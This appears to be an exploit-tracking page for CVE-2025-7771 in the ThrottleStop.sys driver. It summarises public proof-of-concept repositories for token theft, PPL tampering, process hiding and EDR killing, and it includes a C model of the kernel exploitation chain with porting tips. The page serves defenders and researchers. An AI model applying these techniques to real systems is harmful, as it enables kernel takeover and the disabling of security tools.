Arbitrary physical memory read/write in ThrottleStop.sys
CVE-2025-7771 affects ThrottleStop.sys, a legitimately signed Windows kernel driver shipped with ThrottleStop (also referred to as rwdrv.sys in some abuse reporting). The driver exposes two IOCTL interfaces that map physical memory with MmMapIoSpace and hand it to the caller for reading and writing, with no restriction on which physical pages may be requested. A user-mode process that can open the device can therefore read and modify arbitrary physical memory, patch the live Windows kernel, and invoke arbitrary kernel functions. This is an insecure kernel-driver design/implementation issue, and because the driver carries a valid signature it also serves as a bring-your-own-vulnerable-driver (BYOVD) path from user mode into ring 0 on systems that never installed ThrottleStop. ThrottleStop.sys version 3.0.0.0 is identified as affected; other versions may be as well. One practical caveat: the IOCTL handlers themselves enforce no access control, but every public PoC listed below runs elevated, because loading the driver service and the Superfetch-based virtual-to-physical translation they depend on require administrator privileges. The primitive is best read as admin-to-kernel (and security-tool evasion) rather than a standalone user-to-admin escalation.
Exploits
11 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (2 hidden).
This repository is a compact Windows local privilege escalation proof-of-concept for CVE-2025-7771 affecting the ThrottleStop.sys driver. The repo contains only two files: a README describing the vulnerability and exploitation strategy, and a single C++ source file implementing the exploit. The exploit is not part of a larger framework. Core capability: the code abuses two vulnerable device IOCTLs exposed by the driver (0x80006498 read and 0x8000649C write) to perform arbitrary physical memory access from an administrator process. It opens the device \\.\ThrottleStop, verifies read access, then uses NtQuerySystemInformation with the Superfetch information class to build a virtual-to-physical translation map. It also obtains the running kernel base, resolves the PsInitialSystemProcess symbol from ntoskrnl.exe, translates that kernel virtual address to a physical address, and reads the SYSTEM process EPROCESS pointer. From there, the exploit performs classic token stealing: it reads the SYSTEM token from the EPROCESS Token field, walks ActiveProcessLinks to find the current process EPROCESS, preserves the low EX_FAST_REF refcount bits, overwrites the current process token with the SYSTEM token via physical memory write, verifies the write, and finally launches C:\Windows\System32\cmd.exe to obtain a SYSTEM shell. Repository structure is minimal and purpose-built: README.md documents the vulnerability, tested Windows versions, required offsets, and exploitation steps; exploit.cpp contains the full implementation including driver I/O helpers, privilege adjustment, Superfetch query structures, virtual-to-physical mapping logic, kernel symbol resolution, EPROCESS traversal, token overwrite, and shell spawning. This is a real exploit rather than a detector, and its maturity is operational because it contains a complete hardcoded privilege-escalation chain and payload outcome (spawn SYSTEM cmd.exe), but it is not generalized into a reusable framework.
This repository is a small Windows BYOVD-focused project with 11 files: one C source file, one C header, and supporting Markdown documentation. Despite README claims that it is only safe reconnaissance, the actual code in src/0xPoC.c is an operational local exploit for Safetica ProcessMonitorDriver.sys (CVE-2026-0828). The program opens the device \\.\STProcessMonitorDriver, enumerates running processes via Toolhelp32 APIs, compares process names against a hardcoded security-product target list from src/0xtargets.h, and for each match sends DeviceIoControl with IOCTL 0xB822200C and a 64-bit PID. Successful execution results in kernel-assisted termination of targeted AV/EDR processes. Repository structure: src/0xPoC.c is the main exploit entry point; src/0xtargets.h contains the hardcoded kill list (Defender, CrowdStrike, SentinelOne, Carbon Black, Cylance, McAfee, Symantec/Norton, Kaspersky, ESET, Bitdefender, Sophos, Malwarebytes, Safetica, etc.). The remaining files are documentation: README.md describes BYOVD research themes; drivers/0xhashes.md lists hashes, device symlink, and IOCTL details for Safetica; research/0xsafetica-cve-2026-0828.md and research/0xthrottlestop-medusalocker.md summarize two vulnerable-driver cases; docs/0xmitigations.md provides defensive guidance. Main exploit capability: local post-compromise abuse of a vulnerable signed Windows driver to kill protected or security-relevant processes. There is no network communication, persistence, or shell payload. The exploit is dependent on the vulnerable driver already being present and started as a service. The code is straightforward and hardcoded rather than modular, so OPERATIONAL is the best maturity fit rather than WEAPONIZED.
Repository purpose: BYOVD research focused on Windows vulnerable signed drivers, with documentation plus a working user-mode PoC that abuses Safetica's ProcessMonitorDriver.sys (CVE-2026-0828) to terminate processes via a vulnerable IOCTL.

Structure (11 files):
- Documentation-heavy: README.md, SECURITY.md, docs/0xmitigations.md (defensive guidance), research/*.md (case studies/patterns), drivers/0xhashes.md (hashes and sources for ProcessMonitorDriver.sys).
- Code: src/0xPoC.c (main program) and src/0xtargets.h (hardcoded list of security product process names).

Main exploit capability (src/0xPoC.c):
- Opens the device interface `\\.\STProcessMonitorDriver` with read/write access.
- Enumerates processes using Toolhelp32 APIs (CreateToolhelp32Snapshot / Process32First/Next).
- For each process whose name matches the list in 0xtargets.h (Defender, CrowdStrike, SentinelOne, etc.), sends `DeviceIoControl` with IOCTL `0xB822200C` and an 8-byte PID (UINT64).
- Reports per-target success/failure and totals.

This is an AV/EDR "kill" primitive implemented through a vulnerable driver (BYOVD), not merely reconnaissance.

Targeting notes:
- CVE-2026-0828: Safetica ProcessMonitorDriver.sys, versions 10.5.75.0 and 11.11.4.0; an unprivileged IOCTL path allows arbitrary process termination.
- CVE-2025-7771: ThrottleStop.sys is discussed in the research notes only (no code in the repo for that chain), including the device `\\.\ThrottleStop` and example IOCTLs in the narrative.

Notable observables for defenders:
- Device name: `\\.\STProcessMonitorDriver` (and the referenced `\\.\ThrottleStop`).
- IOCTL `0xB822200C` used for termination.
- The process target list in src/0xtargets.h can be used as an indicator of intent (EDR/AV neutralization).

Sanity: despite README claims of "zero working exploits," the included C program does implement an operational IOCTL-based process termination routine against the Safetica driver, contingent on the vulnerable driver being present and loaded.
Repository is a Rust-based local Windows kernel exploit for CVE-2025-7771. It bundles a vulnerable kernel driver (referenced in the README as data.rs; imported as the src/data module) and uses it to obtain arbitrary kernel memory read/write.

Core flow (src/main.rs):
1. Generate a random service/driver name.
2. Drop the embedded vulnerable driver bytes to %TEMP%\<name>.sys (utils::drop_vulnerable_driver).
3. Create and start a kernel-driver service (service.rs, a wrapper around the SCM APIs).
4. Open the device \??\<service_name> (exploit.rs) and build a MemoryMap (spf.rs) to translate virtual to physical addresses.
5. Demonstrate the primitive by resolving the ntoskrnl base (nt.rs, via NtQuerySystemInformation(SystemModuleInformation)) and parsing ntoskrnl.exe exports (nt.rs + pe.rs + filemap.rs). It then reads 4 bytes from MmGetSystemRoutineAddress and patches its first 3 bytes with 31 C0 C3 (xor eax, eax; ret), so the routine returns NULL to every caller.
6. Stop and delete the driver service and exit.

Key exploit capability (src/exploit.rs):
- Arbitrary kernel read/write: translate the target virtual address to a physical address (spf::MemoryMap::translate), then invoke the vulnerable driver's IOCTLs to map that physical memory into user space (IOCTL 0x8000645C) and unmap it again (0x80006460). Data is copied with ptr::copy_nonoverlapping. Note that these IOCTL codes and the device path differ from the \\.\ThrottleStop PoCs elsewhere on this page: the service name, and hence the device name, is randomized per run, so defenders should key on the dropped %TEMP% .sys file and the driver's hash rather than on a fixed device path.

Supporting modules:
- src/spf.rs: Superfetch/PFN-query based VA->PA translation (builds a HashMap of virtual page -> physical page). Attempts to enable SE_PROF_SINGLE_PROCESS_PRIVILEGE and SE_DEBUG_PRIVILEGE.
- src/service.rs: Service Control Manager wrapper to create/start/stop/delete the kernel driver service.
- src/filemap.rs: Win32 file mapping wrapper used to map ntoskrnl.exe as an image.
- src/nt.rs: NT helpers: privilege adjustment declarations, NtQuerySystemInformation usage, kernel base discovery, and export resolution.
- src/pe.rs: PE structures/constants for parsing exports.

No network IOCs are present; all targeting is local via a Windows device handle, IOCTLs, and local file paths.
Repository purpose: a Windows local PoC for CVE-2025-7771 targeting the ThrottleStop.sys kernel driver. The exploit opens the device \\.\ThrottleStop and uses two hardcoded IOCTLs for arbitrary physical memory read (0x80006498) and write (0x8000649C). To make those primitives usable against kernel virtual addresses, it embeds a C++ "Superfetch" helper (compiled via build.rs into a static library) that snapshots the system memory map using NtQuerySystemInformation(SystemSuperfetchInformation = 79) and PFN queries, caching translations from virtual page addresses to physical addresses.

Main capabilities implemented:
- Arbitrary physical memory read/write (8-byte reads; writes chunked/padded to 8 bytes via BreakBuffer).
- Kernel symbol resolution: enumerates loaded kernel drivers to get the kernel base VA (EnumDeviceDrivers), then loads ntoskrnl.exe in userland and resolves PsInitialSystemProcess via GetProcAddress to compute its kernel VA.
- EPROCESS discovery: reads PsInitialSystemProcess to obtain the System EPROCESS pointer, then walks the ActiveProcessLinks list to find a target process by PID.
- Process "protection" toggling: writes a single byte at EPROCESS+Protection (offset 0x87A). The PoC sets 0x61 (PPL-like) to protect and 0x00 to unprotect.
- Process hiding/unhiding: DKOM-style unlink/relink by rewriting the LIST_ENTRY pointers in ActiveProcessLinks. Unhide requires the caller to provide the hidden process's EPROCESS address, since the unlinked process can no longer be found by walking the list.

Repository structure:
- Rust core: src/main.rs (CLI entry), src/utils.rs (clap subcommands), src/driver.rs (device open + IOCTL read/write), src/kernel.rs (kernel base + symbol offset), src/eprocess.rs (process enumeration + EPROCESS manipulation), src/superfetch.rs (FFI bindings).
- C++ helper: superfetch/superfetch.h + nt.h implement Superfetch PFN/memory range querying and VA->PA translation; superfetch/wrapper.cpp exposes C ABI wrappers used by Rust.

Operational notes/assumptions:
- This is a local exploit/PoC (not networked). It requires administrative rights to load/start the vulnerable driver service and to perform the Superfetch privilege adjustments.
- The EPROCESS offsets are hardcoded and therefore Windows-build dependent; reliability will vary across versions.
- No reverse shell or remote payload is included; the delivered effect is kernel memory manipulation enabling stealth (hide) and process protection changes.
This repository is a proof-of-concept (PoC) exploit for CVE-2025-7771, targeting a vulnerability in the ThrottleStop driver on Windows Server 2022. The exploit leverages the driver's arbitrary physical memory read/write IOCTLs to manipulate kernel memory, specifically the EPROCESS structure of any process, in order to change its Protected Process Light (PPL) protection level. The codebase is written in C and structured as a Visual Studio project, with main logic in 'main.c', memory manipulation in 'exploit.c', process structure handling in 'eprocess.c' and 'ppl.c', and virtual-to-physical address translation in 'vtop.c'. The exploit requires the vulnerable driver to be loaded and administrator privileges. The main entry point is 'main.c', which parses command-line arguments, opens the driver, builds a memory map, and invokes the core exploit functionality. The exploit is operational as a PoC and demonstrates local privilege escalation by allowing arbitrary modification of process protection levels, effectively bypassing Windows process security boundaries.
This repository is a proof-of-concept (POC) exploit for CVE-2025-7771, a local privilege escalation vulnerability in the ThrottleStop.sys driver (version 3.0.0.0) on Windows. The exploit demonstrates how to leverage the driver's exposed IOCTLs to perform arbitrary physical memory reads and writes from user mode, without any access control. The codebase consists of C++ source and header files, with the main logic in 'Entry.cpp' and driver interaction in 'Driver/Driver.h'. The exploit uses the Superfetch technique (implemented in 'Superfetch/Superfetch.h' and 'Superfetch/nt.h') to translate kernel virtual addresses to physical addresses, which are then accessed via DeviceIoControl calls to the driver. The main attack vector is local: an attacker must execute code on the target system with sufficient privileges to open a handle to the driver. The only fingerprintable endpoint is the device file '\\.\ThrottleStop'. The exploit can be used to read or modify any physical memory, enabling kernel code modification, disabling security features, or escalating privileges. The repository is structured as a Visual Studio C++ project, with clear separation between driver communication, memory translation, and the main exploit logic.
This repository contains a functional exploit for CVE-2025-7771, targeting the ThrottleStop driver on Windows. The exploit leverages the driver's capabilities to read and write physical memory, allowing a user-mode process to invoke arbitrary kernel-mode functions. The main entry point is 'main.cpp', which demonstrates creating a ThrottleStop instance, resolving kernel base addresses, and calling the kernel function 'DbgPrint' from user mode. The core logic is implemented in 'throttlestop/throttlestop.cpp' and 'throttlestop/throttlestop.h', which provide methods for interacting with the driver, resolving kernel exports, and patching kernel memory to redirect execution flow. The exploit requires the ThrottleStop driver to be present and accessible, and it interacts with the driver via the device interface '\\.\ThrottleStop'. The repository is well-structured, with separate components for service management, memory mapping, and kernel interaction. The exploit demonstrates operational maturity, providing a working method for kernel code execution from user mode, which can be leveraged for privilege escalation or further exploitation.
This repository is a proof-of-concept (PoC) exploit for CVE-2025-7771, targeting the ThrottleStop driver on Windows systems. The exploit leverages several unprotected IOCTLs exposed by the driver to perform arbitrary physical memory and I/O port read/write operations from user mode. The main entry point is 'src/Main.c', which checks for administrative privileges, opens a handle to the ThrottleStop device (\\.\ThrottleStop), and demonstrates reading the UniqueProcessId from the EPROCESS structure of the System process. It also offers the option to force a system restart by writing to I/O port 0xCF9. The exploit includes code for translating virtual to physical addresses using undocumented Superfetch APIs (src/vtop.c), and for resolving EPROCESS structures (src/EProcess.c). The IOCTL codes and their purposes are well documented in the README and headers. The exploit is intended for research and demonstration purposes, and requires the vulnerable driver to be loaded and accessible. No network endpoints are involved; the attack vector is local privilege escalation via direct device access.
This repository provides a working local privilege escalation exploit for CVE-2025-7771, a vulnerability in the ThrottleStop.sys driver by TechPowerUp. The vulnerability arises from exposed IOCTL interfaces (0x80006498 for reading and 0x8000649C for writing) that perform no access checks, so any caller able to open the device can map and manipulate arbitrary physical memory via MmMapIoSpace. The exploit is implemented in C++ and consists of a usermode application (Entry.cpp) and a driver communication class (Driver.h). The MemoryDriver class opens a handle to the device (\\.\ThrottleStop), enumerates processes, and performs physical memory operations using DeviceIoControl. The exploit demonstrates reading and writing physical memory belonging to a target process (e.g., notepad.exe) and restoring the original values afterwards. The repository includes build instructions, usage guidance, and references to advisories and analyses. The exploit requires the vulnerable driver to be installed and running, and administrator privileges to execute (the missing access check is in the driver; the PoC itself still runs elevated). The main attack vector is local, and the primary fingerprintable endpoint is the device file \\.\ThrottleStop. The code is operational and can be used to escalate privileges or execute arbitrary code in kernel context on affected Windows systems.
This repository contains a working local privilege escalation exploit for CVE-2025-7771, targeting the ThrottleStop.sys driver (version 3.0.0.0) on Windows 10 and 11 x64 systems. The exploit is implemented in a single C++ file (exploit.cpp) and leverages insecure IOCTLs exposed by the driver to perform arbitrary kernel memory read/write via MmMapIoSpace. The exploit disables security features (ETW, AMSI), attempts to patch the kernel for privilege escalation, steals the SYSTEM token, and spawns a new SYSTEM shell (cmd.exe by default) using process hollowing for stealth. The README provides detailed vulnerability information, compilation instructions, and mitigation advice. The main attack vector is local, requiring code execution on the target system. The only fingerprintable endpoints are the device object (\\Device\\ThrottleStop) and the default SYSTEM shell path (C:\Windows\System32\cmd.exe). The exploit is operational and suitable for use in controlled testing environments.
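The chain that most of the PoCs above share (an 8-byte physical read/write primitive, a Superfetch-derived VA-to-PA map, an ActiveProcessLinks walk from PsInitialSystemProcess, token theft that preserves the EX_FAST_REF count bits, the single-byte Protection write, and the DKOM unlink) is easiest to reason about over a model you can run anywhere. The following is an added example written for this page; it is not code from any of the listed repositories. It replaces the driver's IOCTLs with reads and writes into a constructed byte array standing in for physical memory, replaces the Superfetch translation with a hand-built page map, and uses hypothetical kernel addresses, token values and EPROCESS offsets (the 0x87A Protection offset is the one a PoC above hard-codes; all offsets are build-dependent and must be verified against the target build).

```c
/* Constructed model of the CVE-2025-7771 post-exploitation chain. Added example, not
 * code from any listed repository. Addresses, offsets and token values are hypothetical. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define PAGE 0x1000ull
static uint8_t phys[4 * PAGE];                 /* constructed "physical memory" */

struct map_entry { uint64_t va_page, pa_page; };
static const struct map_entry page_map[] = {   /* constructed VA->PA map (Superfetch stand-in) */
    { 0xFFFFF80000000000ull, 0 * PAGE },       /* page holding PsInitialSystemProcess */
    { 0xFFFF800000010000ull, 1 * PAGE },       /* System EPROCESS, pid 4 */
    { 0xFFFF800000011000ull, 2 * PAGE },       /* EPROCESS, pid 1234 */
    { 0xFFFF800000012000ull, 3 * PAGE },       /* EPROCESS, pid 5678 (the attacker's process) */
};
#define PS_INITIAL_SYSTEM_PROCESS 0xFFFFF80000000100ull  /* hypothetical VA of the exported pointer */
static const uint64_t eproc_va[3] = { 0xFFFF800000010000ull, 0xFFFF800000011000ull, 0xFFFF800000012000ull };

/* Hypothetical, build-dependent EPROCESS offsets; 0x87A (Protection) is the value one PoC hard-codes. */
#define OFF_PID   0x440
#define OFF_LINKS 0x448
#define OFF_TOKEN 0x4B8
#define OFF_PROT  0x87A
#define EX_FAST_REF_MASK 0xFull    /* low 4 bits of an x64 EX_FAST_REF hold the fast-reference count */

static int translate(uint64_t va, uint64_t *pa) {
    for (size_t i = 0; i < sizeof page_map / sizeof page_map[0]; i++)
        if (page_map[i].va_page == (va & ~(PAGE - 1))) { *pa = page_map[i].pa_page | (va & (PAGE - 1)); return 1; }
    return 0;
}
/* The driver primitive: one qword of physical memory per call (stand-in for the read/write IOCTLs). */
static uint64_t phys_read64(uint64_t pa) { uint64_t v; memcpy(&v, phys + pa, 8); return v; }
static void     phys_write64(uint64_t pa, uint64_t v) { memcpy(phys + pa, &v, 8); }
static uint64_t kread64(uint64_t va) { uint64_t pa; return translate(va, &pa) ? phys_read64(pa) : 0; }
static uint8_t  kread8(uint64_t va)  { uint64_t pa; return translate(va, &pa) ? phys[pa] : 0; }

/* Arbitrary-length kernel write over an 8-byte primitive: read-modify-write each qword touched,
 * so a single-byte Protection write does not clobber its neighbours. */
static int kwrite(uint64_t va, const void *src, size_t len) {
    for (const uint8_t *s = src; len; ) {
        uint64_t pa, word;
        if (!translate(va, &pa)) return 0;
        uint64_t aligned = pa & ~7ull;
        size_t off = (size_t)(pa - aligned), n = 8 - off < len ? 8 - off : len;
        word = phys_read64(aligned);
        memcpy((uint8_t *)&word + off, s, n);
        phys_write64(aligned, word);
        va += n; s += n; len -= n;
    }
    return 1;
}

/* Populate the fake kernel: three EPROCESS nodes in a circular ActiveProcessLinks list. */
static void build_constructed_kernel(void) {
    const uint64_t pids[3]   = { 4, 1234, 5678 };
    const uint64_t tokens[3] = { 0xFFFF9A8000001005ull, 0xFFFF9A8000002003ull, 0xFFFF9A800000300Aull };
    memset(phys, 0, sizeof phys);
    for (int i = 0; i < 3; i++) {
        uint64_t flink = eproc_va[(i + 1) % 3] + OFF_LINKS, blink = eproc_va[(i + 2) % 3] + OFF_LINKS;
        kwrite(eproc_va[i] + OFF_PID, &pids[i], 8);
        kwrite(eproc_va[i] + OFF_LINKS, &flink, 8);
        kwrite(eproc_va[i] + OFF_LINKS + 8, &blink, 8);
        kwrite(eproc_va[i] + OFF_TOKEN, &tokens[i], 8);
    }
    kwrite(PS_INITIAL_SYSTEM_PROCESS, &eproc_va[0], 8);
}

/* Walk ActiveProcessLinks from PsInitialSystemProcess. LIST_ENTRY pointers address the links
 * field, not the EPROCESS base, hence the OFF_LINKS subtraction. Bounded so a corrupted list cannot spin. */
static uint64_t find_eprocess(uint64_t pid) {
    uint64_t head = kread64(PS_INITIAL_SYSTEM_PROCESS), cur = head;
    for (int guard = 0; guard < 4096; guard++) {
        if (kread64(cur + OFF_PID) == pid) return cur;
        cur = kread64(cur + OFF_LINKS) - OFF_LINKS;
        if (cur == head) break;
    }
    return 0;
}

/* Token theft: take the System token pointer but keep the target's own EX_FAST_REF count bits. */
static int steal_token(uint64_t target_pid) {
    uint64_t sys = find_eprocess(4), tgt = find_eprocess(target_pid);
    if (!sys || !tgt) return 0;
    uint64_t val = (kread64(sys + OFF_TOKEN) & ~EX_FAST_REF_MASK) | (kread64(tgt + OFF_TOKEN) & EX_FAST_REF_MASK);
    return kwrite(tgt + OFF_TOKEN, &val, 8) && kread64(tgt + OFF_TOKEN) == val;   /* verify, as the PoC does */
}

/* Protection byte: 0x61 for a PPL-like setting, 0x00 to clear it (the values the PoC above uses). */
static int set_protection(uint64_t pid, uint8_t level) {
    uint64_t ep = find_eprocess(pid);
    return ep && kwrite(ep + OFF_PROT, &level, 1);
}

/* DKOM unlink: neighbours are rewritten to skip the target; the target keeps its own Flink/Blink,
 * which is why an "unhide" needs the hidden EPROCESS address supplied by the caller. */
static int unlink_process(uint64_t pid) {
    uint64_t ep = find_eprocess(pid);
    if (!ep) return 0;
    uint64_t flink = kread64(ep + OFF_LINKS), blink = kread64(ep + OFF_LINKS + 8);
    return kwrite(blink, &flink, 8) && kwrite(flink + 8, &blink, 8);
}

int main(void) {
    build_constructed_kernel();
    printf("steal_token(5678): %d, token now %#llx\n", steal_token(5678),
           (unsigned long long)kread64(eproc_va[2] + OFF_TOKEN));
    printf("set_protection(1234, 0x61): %d, byte now %#x\n", set_protection(1234, 0x61), kread8(eproc_va[1] + OFF_PROT));
    printf("unlink_process(1234): %d, still findable: %d\n", unlink_process(1234), find_eprocess(1234) != 0);
    return 0;
}
```

Two details matter when porting this against a real primitive. First, the write path is read-modify-write at qword granularity, which is what "chunked/padded to 8 bytes" means in practice; a naive 8-byte write at EPROCESS+0x87A would overwrite seven adjacent bytes of the structure. Second, the token swap keeps the low four bits of the target's existing EX_FAST_REF, so the fast-reference count the kernel expects to find there is not corrupted; copying the raw System value would eventually trigger a bugcheck when references are released.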
Recent activity
17 sources tracked across advisories, community write-ups, and news.
A vulnerable kernel driver (rwdrv.sys) associated with ThrottleStop abused for BYOVD-based defense evasion in ransomware intrusions.
A vulnerability (or abuse path) involving exploitation of a signed kernel driver, described in the context of a red team operation.
A vulnerability in the signed ThrottleStop.sys driver that can be abused (BYOVD-style) due to unsafe memory access handling, enabling attackers to gain high privileges/control and disable security tooling.